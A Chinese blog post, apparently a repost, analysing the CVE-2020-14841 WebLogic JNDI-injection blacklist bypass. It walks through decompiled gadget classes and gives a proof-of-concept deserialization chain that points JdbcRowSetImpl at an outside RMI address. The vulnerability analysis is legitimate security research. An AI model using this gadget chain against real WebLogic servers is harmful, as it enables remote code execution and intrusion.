这篇文章将为大家详细讲解有关如何进行CVE 2020-14841 WebLogic JNDI注入绕过的分析,文章内容质量较高,因此小编分享给大家做个参考,希望大家阅读完这篇文章后对相关知识有一定的了解。
通过diff 升级包中weblogic的黑名单,我们发现新增了这个类:
oracle.eclipselink.coherence.integrated.internal.cache.LockVersionExtractor
package oracle.eclipselink.coherence.integrated.internal.cache;import com.tangosol.io.ExternalizableLite;import com.tangosol.io.pof.PofReader;import com.tangosol.io.pof.PofWriter;import com.tangosol.io.pof.PortableObject;import com.tangosol.util.ExternalizableHelper;import com.tangosol.util.ValueExtractor;import java.io.DataInput;import java.io.DataOutput;import java.io.IOException;import oracle.eclipselink.coherence.integrated.cache.Wrapper;import oracle.eclipselink.coherence.integrated.internal.querying.EclipseLinkExtractor;import org.eclipse.persistence.mappings.AttributeAccessor;public class LockVersionExtractor implements ValueExtractor, ExternalizableLite, PortableObject, EclipseLinkExtractor {protected AttributeAccessor accessor;protected String className;public LockVersionExtractor() {}public LockVersionExtractor(AttributeAccessor accessor, String className) {this.accessor = accessor;this.className = className;}public Object extract(Object arg0) {if(arg0 == null) {returnnull;} else{if(arg0 instanceof Wrapper) {arg0 = ((Wrapper)arg0).unwrap();}if(!this.accessor.isInitialized()) {this.accessor.initializeAttributes(arg0.getClass());}returnthis.accessor.getAttributeValueFromObject(arg0);}}
我们可以从代码上看出来,类似与 cve-2020-2555,用法也都是一样的。触发漏洞的重点在于this.accessor.getAttributeValueFromObject 中。下面选取一个可能的执行路径
package org.eclipse.persistence.internal.descriptors;public class MethodAttributeAccessor extends AttributeAccessor {protected String setMethodName = "";protected String getMethodName;protected transient Method setMethod;protected transient Method getMethod;public Object getAttributeValueFromObject(Object anObject) throws DescriptorException {returnthis.getAttributeValueFromObject(anObject, (Object[])null);}protected Object getAttributeValueFromObject(Object anObject, Object[] parameters) throws DescriptorException {try {if(PrivilegedAccessHelper.shouldUsePrivilegedAccess()) {try {returnAccessController.doPrivileged(new PrivilegedMethodInvoker(this.getGetMethod(), anObject, parameters));} catch (PrivilegedActionException var5) {Exception throwableException = var5.getException();if(throwableException instanceof IllegalAccessException) {throw DescriptorException.illegalAccessWhileGettingValueThruMethodAccessor(this.getGetMethodName(), anObject.getClass().getName(), throwableException);} else{throw DescriptorException.targetInvocationWhileGettingValueThruMethodAccessor(this.getGetMethodName(), anObject.getClass().getName(), throwableException);}}} else{returnthis.getMethod.invoke(anObject, parameters);}
MethodAttributeAccessor中getAttributeValueFromObject函数缺点在于,只能执行无参的函数,从这点来看,我们很容易的与七月份 cve-2020-14645 联想起来
所以照猫画虎 poc如下
// JdbcRowSetImplJdbcRowSetImpl jdbcRowSet = new JdbcRowSetImpl();jdbcRowSet.setDataSourceName("rmi://192.168.3.254:8888/xsmd");MethodAttributeAccessor methodAttributeAccessor = new MethodAttributeAccessor();methodAttributeAccessor.setGetMethodName("getDatabaseMetaData");methodAttributeAccessor.setIsWriteOnly(true);methodAttributeAccessor.setAttributeName("UnicodeSec");LockVersionExtractor extractor = new LockVersionExtractor(methodAttributeAccessor, "UnicodeSec");final ExtractorComparator comparator = new ExtractorComparator(extractor);final PriorityQueue<Object> queue = new PriorityQueue<Object>(2, comparator);Object[] q = new Object[]{jdbcRowSet, jdbcRowSet};Reflections.setFieldValue(queue, "queue", q);Reflections.setFieldValue(queue, "size", 2);Field comparatorF = queue.getClass().getDeclaredField("comparator");comparatorF.setAccessible(true);comparatorF.set(queue, new ExtractorComparator(extractor));
关于如何进行CVE 2020-14841 WebLogic JNDI注入绕过的分析就分享到这里了,希望以上内容可以对大家有一定的帮助,可以学到更多知识。如果觉得文章不错,可以把它分享出去让更多的人看到。
亿速云「云服务器」,即开即用、新一代英特尔至强铂金CPU、三副本存储NVMe SSD云盘,价格低至29元/月。点击查看>>
免责声明:本站发布的内容(图片、视频和文字)以原创、转载和分享为主,文章观点不代表本网站立场,如果涉及侵权请联系站长邮箱:is@yisu.com进行举报,并提供相关证据,一经查实,将立刻删除涉嫌侵权内容。
原文链接:https://www.freebuf.com/articles/web/252652.html